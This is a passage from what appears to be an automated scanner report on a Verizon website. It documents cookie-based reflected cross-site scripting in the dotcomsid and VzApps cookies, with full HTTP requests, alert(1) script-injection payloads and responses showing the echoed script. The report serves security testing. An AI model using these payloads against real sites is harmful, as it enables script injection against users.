NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102479
Expires: Sat, 20 Nov 2010 02:56:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:41 GMT; path=/
Set-Cookie: ContextInfo_State=TXc9efe<script>alert(1)</script>6775dca418; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:41 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC9EFE<SCRIPT>ALERT(1)</SCRIPT>6775DCA418 </DIV>
...[SNIP]...

1.177. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb6fd"-alert(1)-"6d30b2026af was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=bb6fd"-alert(1)-"6d30b2026af; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 108514
Expires: Sat, 20 Nov 2010 02:56:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "bb6fd"-alert(1)-"6d30b2026af"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: docu
...[SNIP]...

1.178. https://www22.verizon.com/Residential/FiOSTV/Check_Availability/Check_Availability.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/Check_Availability/Check_Availability.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d6663'><script>alert(1)</script>7127b0cbbb7 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Check_Availability/Check_Availability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXd6663'><script>alert(1)</script>7127b0cbbb7; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58577
Expires: Sat, 20 Nov 2010 02:52:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:52:21 GMT
Connection: close
Set-Cookie: ContextInfo_LoopQual=; path=/
Set-Cookie: ContextInfo_State=TXd6663'><script>alert(1)</script>7127b0cbbb7; path=/

<html xmlns:vz>
<head id="_ctl0_head"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><title>
Verizon | FiOS TV Availability
</title>
<style>
.channel_list .essent
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD6663'><SCRIPT>ALERT(1)</SCRIPT>7127B0CBBB7 ' />
...[SNIP]...

1.179. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 3c7ba<script>alert(1)</script>61b8323e3a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX3c7ba<script>alert(1)</script>61b8323e3a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79330
Expires: Sat, 20 Nov 2010 02:57:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX3c7ba<script>alert(1)</script>61b8323e3a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:07 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:07 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:07 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3C7BA<SCRIPT>ALERT(1)</SCRIPT>61B8323E3A </DIV>
...[SNIP]...

1.180. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7319b'><script>alert(1)</script>b412aee3463 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX7319b'><script>alert(1)</script>b412aee3463; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

